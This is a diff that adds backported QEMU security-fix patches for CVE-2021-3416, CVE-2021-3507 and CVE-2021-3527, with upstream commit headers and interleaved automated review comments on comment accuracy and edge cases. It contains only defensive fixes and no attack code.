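+@@ -143,12 +143,17 @@ void *qemu_get_nic_opaque(NetClientState *nc);
+ void qemu_del_net_client(NetClientState *nc);
+ typedef void (*qemu_nic_foreach)(NICState *nic, void *opaque);
+ void qemu_foreach_nic(qemu_nic_foreach func, void *opaque);
++int qemu_can_receive_packet(NetClientState *nc);
+ int qemu_can_send_packet(NetClientState *nc);
+ ssize_t qemu_sendv_packet(NetClientState *nc, const struct iovec *iov,
+ int iovcnt);
+ ssize_t qemu_sendv_packet_async(NetClientState *nc, const struct iovec *iov,
+ int iovcnt, NetPacketSent *sent_cb);
+ ssize_t qemu_send_packet(NetClientState *nc, const uint8_t *buf, int size);
++ssize_t qemu_receive_packet(NetClientState *nc, const uint8_t *buf, int size);
++ssize_t qemu_receive_packet_iov(NetClientState *nc,
++ const struct iovec *iov,
++ int iovcnt);
+ ssize_t qemu_send_packet_raw(NetClientState *nc, const uint8_t *buf, int size);
+ ssize_t qemu_send_packet_async(NetClientState *nc, const uint8_t *buf,
+ int size, NetPacketSent *sent_cb);
+diff --git a/include/net/queue.h b/include/net/queue.h
+index c0269bb1d..9f2f289d7 100644
+--- a/include/net/queue.h
++++ b/include/net/queue.h
+@@ -55,6 +55,14 @@ void qemu_net_queue_append_iov(NetQueue *queue,
+
+ void qemu_del_net_queue(NetQueue *queue);
+
++ssize_t qemu_net_queue_receive(NetQueue *queue,
++ const uint8_t *data,
++ size_t size);
++
++ssize_t qemu_net_queue_receive_iov(NetQueue *queue,
++ const struct iovec *iov,
++ int iovcnt);
++
+ ssize_t qemu_net_queue_send(NetQueue *queue,
+ NetClientState *sender,
+ unsigned flags,
+diff --git a/net/net.c b/net/net.c
+index 6a2c3d956..5e15e5d27 100644
+--- a/net/net.c
++++ b/net/net.c
+@@ -528,6 +528,17 @@ int qemu_set_vnet_be(NetClientState *nc, bool is_be)
+ #endif
+ }
+
++int qemu_can_receive_packet(NetClientState *nc)
++{
++ if (nc->receive_disabled) {
++ return 0;
++ } else if (nc->info->can_receive &&
++ !nc->info->can_receive(nc)) {
++ return 0;
++ }
++ return 1;
++}
++
+ int qemu_can_send_packet(NetClientState *sender)
+ {
+ int vm_running = runstate_is_running();
+@@ -540,13 +551,7 @@ int qemu_can_send_packet(NetClientState *sender)
+ return 1;
+ }
+
+- if (sender->peer->receive_disabled) {
+- return 0;
+- } else if (sender->peer->info->can_receive &&
+- !sender->peer->info->can_receive(sender->peer)) {
+- return 0;
+- }
+- return 1;
++ return qemu_can_receive_packet(sender->peer);
+ }
+
+ static ssize_t filter_receive_iov(NetClientState *nc,
+@@ -679,6 +684,25 @@ ssize_t qemu_send_packet(NetClientState *nc, const uint8_t *buf, int size)
+ return qemu_send_packet_async(nc, buf, size, NULL);
+ }
+
++ssize_t qemu_receive_packet(NetClientState *nc, const uint8_t *buf, int size)
++{
++ if (!qemu_can_receive_packet(nc)) {
++ return 0;
++ }
++
++ return qemu_net_queue_receive(nc->incoming_queue, buf, size);
++}
++
++ssize_t qemu_receive_packet_iov(NetClientState *nc, const struct iovec *iov,
++ int iovcnt)
++{
++ if (!qemu_can_receive_packet(nc)) {
++ return 0;
++ }
++
++ return qemu_net_queue_receive_iov(nc->incoming_queue, iov, iovcnt);
++}
++
+ ssize_t qemu_send_packet_raw(NetClientState *nc, const uint8_t *buf, int size)
+ {
+ return qemu_send_packet_async_with_flags(nc, QEMU_NET_PACKET_FLAG_RAW,
+diff --git a/net/queue.c b/net/queue.c
+index 19e32c80f..c872d51df 100644
+--- a/net/queue.c
++++ b/net/queue.c
+@@ -182,6 +182,28 @@ static ssize_t qemu_net_queue_deliver_iov(NetQueue *queue,
+ return ret;
+ }
+
++ssize_t qemu_net_queue_receive(NetQueue *queue,
++ const uint8_t *data,
++ size_t size)
++{
++ if (queue->delivering) {
++ return 0;
++ }
++
++ return qemu_net_queue_deliver(queue, NULL, 0, data, size);
++}
++
++ssize_t qemu_net_queue_receive_iov(NetQueue *queue,
++ const struct iovec *iov,
++ int iovcnt)
++{
++ if (queue->delivering) {
++ return 0;
++ }
++
++ return qemu_net_queue_deliver_iov(queue, NULL, 0, iov, iovcnt);
++}
++
+ ssize_t qemu_net_queue_send(NetQueue *queue,
+ NetClientState *sender,
+ unsigned flags,
+--
+2.29.2
+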
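Review bot: The new `qemu_receive_packet()` and `qemu_receive_packet_iov()` prototypes in include/net/net.h carry no comment stating their contract, and callers need it. When `qemu_can_receive_packet()` fails or `queue->delivering` is set, the packet is dropped and 0 is returned. I would add above the prototypes `/* Loopback delivery to nc itself; returns 0 and drops the packet if nc cannot receive or its incoming queue is already delivering (re-entrancy guard). */`. Separately, `qemu_receive_packet()` takes `int size` and passes it to the `size_t size` parameter of `qemu_net_queue_receive()`, so a negative length from a device model would be converted to a very large one. That mirrors the existing `qemu_send_packet()` signature, so it is a point for the converted callers to keep in mind rather than a change request here.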
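--- /dev/null
+++ b/meta/recipes-devtools/qemu/qemu/CVE-2021-3416_10.patch
@@ -0,0 +1,41 @@
+From 65b851efd3d0280425c202f4e5880c48f8334dae Mon Sep 17 00:00:00 2001
+From: Alexander Bulekov <alxndr@bu.edu>
+Date: Mon, 1 Mar 2021 14:35:30 -0500
+Subject: [PATCH 10/10] lan9118: switch to use qemu_receive_packet() for
+ loopback
+MIME-Version: 1.0
+Content-Type: text/plain; charset=UTF-8
+Content-Transfer-Encoding: 8bit
+
+This patch switches to use qemu_receive_packet() which can detect
+reentrancy and return early.
+
+This is intended to address CVE-2021-3416.
+
+Cc: Prasad J Pandit <ppandit@redhat.com>
+Cc: qemu-stable@nongnu.org
+Reviewed-by: Philippe Mathieu-Daudé <philmd@redhat.com
+Signed-off-by: Alexander Bulekov <alxndr@bu.edu>
+Signed-off-by: Jason Wang <jasowang@redhat.com>
+
+Upstream-Status: Backport [37cee01784ff0df13e5209517e1b3594a5e792d1]
+CVE: CVE-2021-3416
+
+Signed-off-by: Sakib Sajal <sakib.sajal@windriver.com>
+---
+ hw/net/lan9118.c | 2 +-
+ 1 file changed, 1 insertion(+), 1 deletion(-)
+
+Index: qemu-4.2.0/hw/net/lan9118.c
+===================================================================
+--- qemu-4.2.0.orig/hw/net/lan9118.c
++++ qemu-4.2.0/hw/net/lan9118.c
+@@ -667,7 +667,7 @@ static void do_tx_packet(lan9118_state *
+ /* FIXME: Honor TX disable, and allow queueing of packets. */
+ if (s->phy_control & 0x4000) {
+ /* This assumes the receive routine doesn't touch the VLANClient. */
+- lan9118_receive(qemu_get_queue(s->nic), s->txp->data, s->txp->len);
++ qemu_receive_packet(qemu_get_queue(s->nic), s->txp->data, s->txp->len);
+ } else {
+ qemu_send_packet(qemu_get_queue(s->nic), s->txp->data, s->txp->len);
+ }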
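Review bot: The context comment `/* This assumes the receive routine doesn't touch the VLANClient. */` stays directly above the new call, although that call no longer invokes `lan9118_receive()` directly. The patch message says `qemu_receive_packet()` detects reentrancy and returns early, which is the property a reader of this branch now needs to know. I would replace the comment with `/* Loopback: deliver through qemu_receive_packet() so re-entrant delivery is detected and the packet dropped. */`. do_tx_packet starts and ends outside the hunk.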
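--- /dev/null
+++ b/meta/recipes-devtools/qemu/qemu/CVE-2021-3416_2.patch
@@ -0,0 +1,42 @@
+From e2a48a3c7cc33dbbe89f896e0f07462cb04ff6b5 Mon Sep 17 00:00:00 2001
+From: Jason Wang <jasowang@redhat.com>
+Date: Wed, 24 Feb 2021 12:13:22 +0800
+Subject: [PATCH 02/10] e1000: switch to use qemu_receive_packet() for loopback
+MIME-Version: 1.0
+Content-Type: text/plain; charset=UTF-8
+Content-Transfer-Encoding: 8bit
+
+This patch switches to use qemu_receive_packet() which can detect
+reentrancy and return early.
+
+This is intended to address CVE-2021-3416.
+
+Cc: Prasad J Pandit <ppandit@redhat.com>
+Cc: qemu-stable@nongnu.org
+Reviewed-by: Philippe Mathieu-Daudé <philmd@redhat.com>
+Signed-off-by: Jason Wang <jasowang@redhat.com>
+
+Upstream-Status: Backport [1caff0340f49c93d535c6558a5138d20d475315c]
+CVE: CVE-2021-3416
+
+Signed-off-by: Sakib Sajal <sakib.sajal@windriver.com>
+---
+ hw/net/e1000.c | 2 +-
+ 1 file changed, 1 insertion(+), 1 deletion(-)
+
+diff --git a/hw/net/e1000.c b/hw/net/e1000.c
+index d7d05ae30..cf22c4f07 100644
+--- a/hw/net/e1000.c
++++ b/hw/net/e1000.c
+@@ -546,7 +546,7 @@ e1000_send_packet(E1000State *s, const uint8_t *buf, int size)
+
+ NetClientState *nc = qemu_get_queue(s->nic);
+ if (s->phy_reg[PHY_CTRL] & MII_CR_LOOPBACK) {
+- nc->info->receive(nc, buf, size);
++ qemu_receive_packet(nc, buf, size);
+ } else {
+ qemu_send_packet(nc, buf, size);
+ }
+--
+2.29.2
+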
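--- /dev/null
+++ b/meta/recipes-devtools/qemu/qemu/CVE-2021-3416_3.patch
@@ -0,0 +1,43 @@
+From c041a4da1ff119715e0ccf2d4a7af62568f17b93 Mon Sep 17 00:00:00 2001
+From: Jason Wang <jasowang@redhat.com>
+Date: Wed, 24 Feb 2021 12:57:40 +0800
+Subject: [PATCH 03/10] dp8393x: switch to use qemu_receive_packet() for
+ loopback packet
+MIME-Version: 1.0
+Content-Type: text/plain; charset=UTF-8
+Content-Transfer-Encoding: 8bit
+
+This patch switches to use qemu_receive_packet() which can detect
+reentrancy and return early.
+
+This is intended to address CVE-2021-3416.
+
+Cc: Prasad J Pandit <ppandit@redhat.com>
+Cc: qemu-stable@nongnu.org
+Reviewed-by: Philippe Mathieu-Daudé <philmd@redhat.com
+Signed-off-by: Jason Wang <jasowang@redhat.com>
+
+Upstream-Status: Backport [331d2ac9ea307c990dc86e6493e8f0c48d14bb33]
+CVE: CVE-2021-3416
+
+Signed-off-by: Sakib Sajal <sakib.sajal@windriver.com>
+---
+ hw/net/dp8393x.c | 2 +-
+ 1 file changed, 1 insertion(+), 1 deletion(-)
+
+diff --git a/hw/net/dp8393x.c b/hw/net/dp8393x.c
+index 205c0decc..533a8304d 100644
+--- a/hw/net/dp8393x.c
++++ b/hw/net/dp8393x.c
+@@ -506,7 +506,7 @@ static void dp8393x_do_transmit_packets(dp8393xState *s)
+ s->regs[SONIC_TCR] |= SONIC_TCR_CRSL;
+ if (nc->info->can_receive(nc)) {
+ s->loopback_packet = 1;
+- nc->info->receive(nc, s->tx_buffer, tx_len);
++ qemu_receive_packet(nc, s->tx_buffer, tx_len);
+ }
+ } else {
+ /* Transmit packet */
+--
+2.29.2
+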
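Review bot: `s->loopback_packet = 1` is set on the line before the new call, and `qemu_receive_packet()` can now return 0 without invoking the device's receive handler when the queue is already delivering. If the flag is cleared only inside that handler, it would stay set and mark the next real packet as loopback. That cannot be checked here, because dp8393x_do_transmit_packets continues outside the hunk, so please confirm and, if needed, clear it after the call with `s->loopback_packet = 0;`. The surrounding guard `if (nc->info->can_receive(nc))` also repeats the test that `qemu_can_receive_packet()` performs inside the helper (CVE-2021-3416_1.patch), and it does so without the helper's NULL check on `can_receive`.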
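--- /dev/null
+++ b/meta/recipes-devtools/qemu/qemu/CVE-2021-3416_5.patch
@@ -0,0 +1,42 @@
+From d465dc79c9ee729d91ef086b993e956b1935be69 Mon Sep 17 00:00:00 2001
+From: Jason Wang <jasowang@redhat.com>
+Date: Wed, 24 Feb 2021 13:14:35 +0800
+Subject: [PATCH 05/10] sungem: switch to use qemu_receive_packet() for
+ loopback
+MIME-Version: 1.0
+Content-Type: text/plain; charset=UTF-8
+Content-Transfer-Encoding: 8bit
+
+This patch switches to use qemu_receive_packet() which can detect
+reentrancy and return early.
+
+This is intended to address CVE-2021-3416.
+
+Cc: Prasad J Pandit <ppandit@redhat.com>
+Cc: qemu-stable@nongnu.org
+Reviewed-by: Mark Cave-Ayland <mark.cave-ayland@ilande.co.uk>
+Reviewed-by: Philippe Mathieu-Daudé <philmd@redhat.com>
+Reviewed-by: Alistair Francis <alistair.francis@wdc.com>
+Signed-off-by: Jason Wang <jasowang@redhat.com>
+
+Upstream-Status: Backport [8c92060d3c0248bd4d515719a35922cd2391b9b4]
+CVE: CVE-2021-3416
+
+Signed-off-by: Sakib Sajal <sakib.sajal@windriver.com>
+---
+ hw/net/sungem.c | 2 +-
+ 1 file changed, 1 insertion(+), 1 deletion(-)
+
+Index: qemu-4.2.0/hw/net/sungem.c
+===================================================================
+--- qemu-4.2.0.orig/hw/net/sungem.c
++++ qemu-4.2.0/hw/net/sungem.c
+@@ -305,7 +305,7 @@ static void sungem_send_packet(SunGEMSta
+ NetClientState *nc = qemu_get_queue(s->nic);
+
+ if (s->macregs[MAC_XIFCFG >> 2] & MAC_XIFCFG_LBCK) {
+- nc->info->receive(nc, buf, size);
++ qemu_receive_packet(nc, buf, size);
+ } else {
+ qemu_send_packet(nc, buf, size);
+ }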
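Review bot: Nothing in the visible patch headers documents why patch 04/10 of this upstream series is missing, since the added files go from CVE-2021-3416_3.patch (03/10) straight to this one (05/10). Presumably the device model it converts is not present in qemu-4.2.0, but a reader auditing CVE-2021-3416 coverage has to look that up to be sure no loopback path was left calling its receive handler directly. A one-line remark in the commit description, or in the header of CVE-2021-3416_1.patch, stating which upstream patch was skipped and why would close that gap.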
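--- /dev/null
+++ b/meta/recipes-devtools/qemu/qemu/CVE-2021-3416_6.patch
@@ -0,0 +1,40 @@
+From c0010f9b2bafe866fe32e3c2688454bc24147136 Mon Sep 17 00:00:00 2001
+From: Jason Wang <jasowang@redhat.com>
+Date: Wed, 24 Feb 2021 13:27:52 +0800
+Subject: [PATCH 06/10] tx_pkt: switch to use qemu_receive_packet_iov() for
+ loopback
+MIME-Version: 1.0
+Content-Type: text/plain; charset=UTF-8
+Content-Transfer-Encoding: 8bit
+
+This patch switches to use qemu_receive_receive_iov() which can detect
+reentrancy and return early.
+
+This is intended to address CVE-2021-3416.
+
+Cc: Prasad J Pandit <ppandit@redhat.com>
+Cc: qemu-stable@nongnu.org
+Reviewed-by: Philippe Mathieu-Daudé <philmd@redhat.com>
+Signed-off-by: Jason Wang <jasowang@redhat.com>
+
+Upstream-Status: Backport [8c552542b81e56ff532dd27ec6e5328954bdda73]
+CVE: CVE-2021-3416
+
+Signed-off-by: Sakib Sajal <sakib.sajal@windriver.com>
+---
+ hw/net/net_tx_pkt.c | 2 +-
+ 1 file changed, 1 insertion(+), 1 deletion(-)
+
+Index: qemu-4.2.0/hw/net/net_tx_pkt.c
+===================================================================
+--- qemu-4.2.0.orig/hw/net/net_tx_pkt.c
++++ qemu-4.2.0/hw/net/net_tx_pkt.c
+@@ -544,7 +544,7 @@ static inline void net_tx_pkt_sendv(stru
+ NetClientState *nc, const struct iovec *iov, int iov_cnt)
+ {
+ if (pkt->is_loopback) {
+- nc->info->receive_iov(nc, iov, iov_cnt);
++ qemu_receive_packet_iov(nc, iov, iov_cnt);
+ } else {
+ qemu_sendv_packet(nc, iov, iov_cnt);
+ }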
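--- /dev/null
+++ b/meta/recipes-devtools/qemu/qemu/CVE-2021-3416_7.patch
@@ -0,0 +1,42 @@
+From 64b38675c728354e4015e4bec3d975cd4cb8a981 Mon Sep 17 00:00:00 2001
+From: Alexander Bulekov <alxndr@bu.edu>
+Date: Fri, 26 Feb 2021 13:47:53 -0500
+Subject: [PATCH 07/10] rtl8139: switch to use qemu_receive_packet() for
+ loopback
+MIME-Version: 1.0
+Content-Type: text/plain; charset=UTF-8
+Content-Transfer-Encoding: 8bit
+
+This patch switches to use qemu_receive_packet() which can detect
+reentrancy and return early.
+
+This is intended to address CVE-2021-3416.
+
+Cc: Prasad J Pandit <ppandit@redhat.com>
+Cc: qemu-stable@nongnu.org
+Buglink: https://bugs.launchpad.net/qemu/+bug/1910826
+Reviewed-by: Philippe Mathieu-Daudé <philmd@redhat.com
+Signed-off-by: Alexander Bulekov <alxndr@bu.edu>
+Signed-off-by: Jason Wang <jasowang@redhat.com>
+
+Upstream-Status: Backport [5311fb805a4403bba024e83886fa0e7572265de4]
+CVE: CVE-2021-3416
+
+Signed-off-by: Sakib Sajal <sakib.sajal@windriver.com>
+---
+ hw/net/rtl8139.c | 2 +-
+ 1 file changed, 1 insertion(+), 1 deletion(-)
+
+Index: qemu-4.2.0/hw/net/rtl8139.c
+===================================================================
+--- qemu-4.2.0.orig/hw/net/rtl8139.c
++++ qemu-4.2.0/hw/net/rtl8139.c
+@@ -1793,7 +1793,7 @@ static void rtl8139_transfer_frame(RTL81
+ }
+
+ DPRINTF("+++ transmit loopback mode\n");
+- rtl8139_do_receive(qemu_get_queue(s->nic), buf, size, do_interrupt);
++ qemu_receive_packet(qemu_get_queue(s->nic), buf, size);
+
+ if (iov) {
+ g_free(buf2);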
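Review bot: The new call drops the `do_interrupt` argument that the removed `rtl8139_do_receive(...)` line passed through, so loopback frames now reach the device with whatever interrupt behaviour its registered receive callback uses. rtl8139_transfer_frame is only partly visible in this hunk, so please confirm that no caller relied on `do_interrupt == 0` for loopback. If the parameter is no longer honoured on this path, a comment at the call such as `/* do_interrupt is not forwarded for loopback: delivery goes through qemu_receive_packet() */` would record the behaviour change for the next reader.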
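--- /dev/null
+++ b/meta/recipes-devtools/qemu/qemu/CVE-2021-3416_8.patch
@@ -0,0 +1,44 @@
+From 023ce62f0a788ad3a8233c7a828554bceeafd031 Mon Sep 17 00:00:00 2001
+From: Alexander Bulekov <alxndr@bu.edu>
+Date: Mon, 1 Mar 2021 10:33:34 -0500
+Subject: [PATCH 08/10] pcnet: switch to use qemu_receive_packet() for loopback
+MIME-Version: 1.0
+Content-Type: text/plain; charset=UTF-8
+Content-Transfer-Encoding: 8bit
+
+This patch switches to use qemu_receive_packet() which can detect
+reentrancy and return early.
+
+This is intended to address CVE-2021-3416.
+
+Cc: Prasad J Pandit <ppandit@redhat.com>
+Cc: qemu-stable@nongnu.org
+Buglink: https://bugs.launchpad.net/qemu/+bug/1917085
+Reviewed-by: Philippe Mathieu-Daudé <philmd@redhat.com
+Signed-off-by: Alexander Bulekov <alxndr@bu.edu>
+Signed-off-by: Jason Wang <jasowang@redhat.com>
+
+Upstream-Status: Backport [99ccfaa1edafd79f7a3a0ff7b58ae4da7c514928]
+CVE: CVE-2021-3416
+
+Signed-off-by: Sakib Sajal <sakib.sajal@windriver.com>
+---
+ hw/net/pcnet.c | 2 +-
+ 1 file changed, 1 insertion(+), 1 deletion(-)
+
+diff --git a/hw/net/pcnet.c b/hw/net/pcnet.c
+index f3f18d859..dcd3fc494 100644
+--- a/hw/net/pcnet.c
++++ b/hw/net/pcnet.c
+@@ -1250,7 +1250,7 @@ txagain:
+ if (BCR_SWSTYLE(s) == 1)
+ add_crc = !GET_FIELD(tmd.status, TMDS, NOFCS);
+ s->looptest = add_crc ? PCNET_LOOPTEST_CRC : PCNET_LOOPTEST_NOCRC;
+- pcnet_receive(qemu_get_queue(s->nic), s->buffer, s->xmit_pos);
++ qemu_receive_packet(qemu_get_queue(s->nic), s->buffer, s->xmit_pos);
+ s->looptest = 0;
+ } else {
+ if (s->nic) {
+--
+2.29.2
+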
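--- /dev/null
+++ b/meta/recipes-devtools/qemu/qemu/CVE-2021-3416_9.patch
@@ -0,0 +1,41 @@
+From ecf7e62bb2cb02c9bd40082504ae376f3e19ffd2 Mon Sep 17 00:00:00 2001
+From: Alexander Bulekov <alxndr@bu.edu>
+Date: Mon, 1 Mar 2021 14:33:43 -0500
+Subject: [PATCH 09/10] cadence_gem: switch to use qemu_receive_packet() for
+ loopback
+MIME-Version: 1.0
+Content-Type: text/plain; charset=UTF-8
+Content-Transfer-Encoding: 8bit
+
+This patch switches to use qemu_receive_packet() which can detect
+reentrancy and return early.
+
+This is intended to address CVE-2021-3416.
+
+Cc: Prasad J Pandit <ppandit@redhat.com>
+Cc: qemu-stable@nongnu.org
+Reviewed-by: Philippe Mathieu-Daudé <philmd@redhat.com>
+Signed-off-by: Alexander Bulekov <alxndr@bu.edu>
+Signed-off-by: Jason Wang <jasowang@redhat.com>
+
+Upstream-Status: Backport [e73adfbeec9d4e008630c814759052ed945c3fed]
+CVE: CVE-2021-3416
+
+Signed-off-by: Sakib Sajal <sakib.sajal@windriver.com>
+---
+ hw/net/cadence_gem.c | 4 ++--
+ 1 file changed, 2 insertions(+), 2 deletions(-)
+
+Index: qemu-4.2.0/hw/net/cadence_gem.c
+===================================================================
+--- qemu-4.2.0.orig/hw/net/cadence_gem.c
++++ qemu-4.2.0/hw/net/cadence_gem.c
+@@ -1225,7 +1225,7 @@ static void gem_transmit(CadenceGEMState
+ /* Send the packet somewhere */
+ if (s->phy_loop || (s->regs[GEM_NWCTRL] &
+ GEM_NWCTRL_LOCALLOOP)) {
+- gem_receive(qemu_get_queue(s->nic), tx_packet,
++ qemu_receive_packet(qemu_get_queue(s->nic), tx_packet,
+ total_bytes);
+ } else {
+ qemu_send_packet(qemu_get_queue(s->nic), tx_packet,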
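--- /dev/null
+++ b/meta/recipes-devtools/qemu/qemu/CVE-2021-3507.patch
@@ -0,0 +1,87 @@
+From defac5e2fbddf8423a354ff0454283a2115e1367 Mon Sep 17 00:00:00 2001
+From: =?UTF-8?q?Philippe=20Mathieu-Daud=C3=A9?= <philmd@redhat.com>
+Date: Thu, 18 Nov 2021 12:57:32 +0100
+Subject: [PATCH] hw/block/fdc: Prevent end-of-track overrun (CVE-2021-3507)
+MIME-Version: 1.0
+Content-Type: text/plain; charset=UTF-8
+Content-Transfer-Encoding: 8bit
+
+Per the 82078 datasheet, if the end-of-track (EOT byte in
+the FIFO) is more than the number of sectors per side, the
+command is terminated unsuccessfully:
+
+* 5.2.5 DATA TRANSFER TERMINATION
+
+ The 82078 supports terminal count explicitly through
+ the TC pin and implicitly through the underrun/over-
+ run and end-of-track (EOT) functions. For full sector
+ transfers, the EOT parameter can define the last
+ sector to be transferred in a single or multisector
+ transfer. If the last sector to be transferred is a par-
+ tial sector, the host can stop transferring the data in
+ mid-sector, and the 82078 will continue to complete
+ the sector as if a hardware TC was received. The
+ only difference between these implicit functions and
+ TC is that they return "abnormal termination" result
+ status. Such status indications can be ignored if they
+ were expected.
+
+* 6.1.3 READ TRACK
+
+ This command terminates when the EOT specified
+ number of sectors have been read. If the 82078
+ does not find an I D Address Mark on the diskette
+ after the second· occurrence of a pulse on the
+ INDX# pin, then it sets the IC code in Status Regis-
+ ter 0 to "01" (Abnormal termination), sets the MA bit
+ in Status Register 1 to "1", and terminates the com-
+ mand.
+
+* 6.1.6 VERIFY
+
+ Refer to Table 6-6 and Table 6-7 for information
+ concerning the values of MT and EC versus SC and
+ EOT value.
+
+* Table 6·6. Result Phase Table
+
+* Table 6-7. Verify Command Result Phase Table
+
+Fix by aborting the transfer when EOT > # Sectors Per Side.
+
+Cc: qemu-stable@nongnu.org
+Cc: Hervé Poussineau <hpoussin@reactos.org>
+Fixes: baca51faff0 ("floppy driver: disk geometry auto detect")
+Reported-by: Alexander Bulekov <alxndr@bu.edu>
+Resolves: https://gitlab.com/qemu-project/qemu/-/issues/339
+Signed-off-by: Philippe Mathieu-Daudé <philmd@redhat.com>
+Message-Id: <20211118115733.4038610-2-philmd@redhat.com>
+Reviewed-by: Hanna Reitz <hreitz@redhat.com>
+Signed-off-by: Kevin Wolf <kwolf@redhat.com>
+
+Upstream-Status: Backport [https://github.com/qemu/qemu/commit/defac5e2fbddf8423a354ff0454283a2115e1367]
+CVE: CVE-2021-3507
+Signed-off-by: Vivek Kumbhar <vkumbhar@mvista.com>
+---
+ hw/block/fdc.c | 8 ++++++++
+ 1 file changed, 8 insertions(+)
+
+diff --git a/hw/block/fdc.c b/hw/block/fdc.c
+index 347875a0cdae..57bb355794a9 100644
+--- a/hw/block/fdc.c
++++ b/hw/block/fdc.c
+@@ -1530,6 +1530,14 @@ static void fdctrl_start_transfer(FDCtrl *fdctrl, int direction)
+ int tmp;
+ fdctrl->data_len = 128 << (fdctrl->fifo[5] > 7 ? 7 : fdctrl->fifo[5]);
+ tmp = (fdctrl->fifo[6] - ks + 1);
++ if (tmp < 0) {
++ FLOPPY_DPRINTF("invalid EOT: %d\n", tmp);
++ fdctrl_stop_transfer(fdctrl, FD_SR0_ABNTERM, FD_SR1_MA, 0x00);
++ fdctrl->fifo[3] = kt;
++ fdctrl->fifo[4] = kh;
++ fdctrl->fifo[5] = ks;
++ return;
++ }
+ if (fdctrl->fifo[0] & 0x80)
+ tmp += fdctrl->fifo[6];
+ fdctrl->data_len *= tmp;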
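Review bot: The added guard tests `tmp < 0`, that is `fdctrl->fifo[6] - ks + 1 < 0`, while the patch message describes the fix as aborting "when EOT > # Sectors Per Side", and nothing at the check says which condition is meant. A comment above it such as `/* EOT (fifo[6]) lies before the current sector ks: the sector count would be negative, so end with abnormal termination */` would make the intent checkable against the datasheet text quoted in the message. The debug line also prints `tmp` under the label "invalid EOT", although the EOT byte is `fdctrl->fifo[6]`. `tmp == 0` still passes the guard and makes `fdctrl->data_len` zero after the multiply unless the `fifo[0] & 0x80` branch adds to it. fdctrl_start_transfer continues outside the hunk, so whether a zero-length transfer is handled safely later cannot be seen here and is worth confirming.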
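--- /dev/null
+++ b/meta/recipes-devtools/qemu/qemu/CVE-2021-3527-1.patch
@@ -0,0 +1,42 @@
+From 05a40b172e4d691371534828078be47e7fff524c Mon Sep 17 00:00:00 2001
+From: Gerd Hoffmann <kraxel@redhat.com>
+Date: Mon, 3 May 2021 15:29:15 +0200
+Subject: [PATCH] usb: limit combined packets to 1 MiB (CVE-2021-3527)
+
+usb-host and usb-redirect try to batch bulk transfers by combining many
+small usb packets into a single, large transfer request, to reduce the
+overhead and improve performance.
+
+This patch adds a size limit of 1 MiB for those combined packets to
+restrict the host resources the guest can bind that way.
+
+Signed-off-by: Gerd Hoffmann <kraxel@redhat.com>
+Message-Id: <20210503132915.2335822-6-kraxel@redhat.com>
+
+Upstream-Status: Backport
+https://gitlab.com/qemu-project/qemu/-/commit/05a40b172e4d691371534828078be47e7fff524c
+CVE: CVE-2021-3527
+Signed-off-by: Chee Yang Lee <chee.yang.lee@intel.com>
+
+---
+ hw/usb/combined-packet.c | 4 +++-
+ 1 file changed, 3 insertions(+), 1 deletion(-)
+
+diff --git a/hw/usb/combined-packet.c b/hw/usb/combined-packet.c
+index 5d57e883dc..e56802f89a 100644
+--- a/hw/usb/combined-packet.c
++++ b/hw/usb/combined-packet.c
+@@ -171,7 +171,9 @@ void usb_ep_combine_input_packets(USBEndpoint *ep)
+ if ((p->iov.size % ep->max_packet_size) != 0 || !p->short_not_ok ||
+ next == NULL ||
+ /* Work around for Linux usbfs bulk splitting + migration */
+- (totalsize == (16 * KiB - 36) && p->int_req)) {
++ (totalsize == (16 * KiB - 36) && p->int_req) ||
++ /* Next package may grow combined package over 1MiB */
++ totalsize > 1 * MiB - ep->max_packet_size) {
+ usb_device_handle_data(ep->dev, first);
+ assert(first->status == USB_RET_ASYNC);
+ if (first->combined) {
+--
+GitLab
+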
diff --git a/meta/recipes-devtools/qemu/qemu/CVE-2021-3527-2.patch b/meta/recipes-devtools/qemu/qemu/CVE-2021-3527-2.patch
new file mode 100644
index 0000000000..6371aced12
--- /dev/null
+++ b/meta/recipes-devtools/qemu/qemu/CVE-2021-3527-2.patch
@@ -0,0 +1,59 @@
1From 7ec54f9eb62b5d177e30eb8b1cad795a5f8d8986 Mon Sep 17 00:00:00 2001
2From: Gerd Hoffmann <kraxel@redhat.com>
3Date: Mon, 3 May 2021 15:29:12 +0200
4Subject: [PATCH] usb/redir: avoid dynamic stack allocation (CVE-2021-3527)
5MIME-Version: 1.0
6Content-Type: text/plain; charset=UTF-8
7Content-Transfer-Encoding: 8bit
8
9Use autofree heap allocation instead.
10
11Fixes: 4f4321c11ff ("usb: use iovecs in USBPacket")
12Reviewed-by: Philippe Mathieu-Daudé <philmd@redhat.com>
13Signed-off-by: Gerd Hoffmann <kraxel@redhat.com>
14Tested-by: Philippe Mathieu-Daudé <philmd@redhat.com>
15Message-Id: <20210503132915.2335822-3-kraxel@redhat.com>
16
17Upstream-Status: Backport
18https://gitlab.com/qemu-project/qemu/-/commit/7ec54f9eb62b5d177e30eb8b1cad795a5f8d8986
19CVE: CVE-2021-3527
20Signed-off-by: Chee Yang Lee <chee.yang.lee@intel.com>
21
22---
23 hw/usb/redirect.c | 6 +++---
24 1 file changed, 3 insertions(+), 3 deletions(-)
25
26diff --git a/hw/usb/redirect.c b/hw/usb/redirect.c
27index 17f06f3417..6a75b0dc4a 100644
28--- a/hw/usb/redirect.c
29+++ b/hw/usb/redirect.c
30@@ -620,7 +620,7 @@ static void usbredir_handle_iso_data(USBRedirDevice *dev, USBPacket *p,
31 .endpoint = ep,
32 .length = p->iov.size
33 };
34- uint8_t buf[p->iov.size];
35+ g_autofree uint8_t *buf = g_malloc(p->iov.size);
36 /* No id, we look at the ep when receiving a status back */
37 usb_packet_copy(p, buf, p->iov.size);
38 usbredirparser_send_iso_packet(dev->parser, 0, &iso_packet,
39@@ -818,7 +818,7 @@ static void usbredir_handle_bulk_data(USBRedirDevice *dev, USBPacket *p,
40 usbredirparser_send_bulk_packet(dev->parser, p->id,
41 &bulk_packet, NULL, 0);
42 } else {
43- uint8_t buf[size];
44+ g_autofree uint8_t *buf = g_malloc(size);
45 usb_packet_copy(p, buf, size);
46 usbredir_log_data(dev, "bulk data out:", buf, size);
47 usbredirparser_send_bulk_packet(dev->parser, p->id,
48@@ -923,7 +923,7 @@ static void usbredir_handle_interrupt_out_data(USBRedirDevice *dev,
49 USBPacket *p, uint8_t ep)
50 {
51 struct usb_redir_interrupt_packet_header interrupt_packet;
52- uint8_t buf[p->iov.size];
53+ g_autofree uint8_t *buf = g_malloc(p->iov.size);
54
55 DPRINTF("interrupt-out ep %02X len %zd id %"PRIu64"\n", ep,
56 p->iov.size, p->id);
57--
58GitLab
59
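--- /dev/null
+++ b/meta/recipes-devtools/qemu/qemu/CVE-2021-3544.patch
@@ -0,0 +1,29 @@
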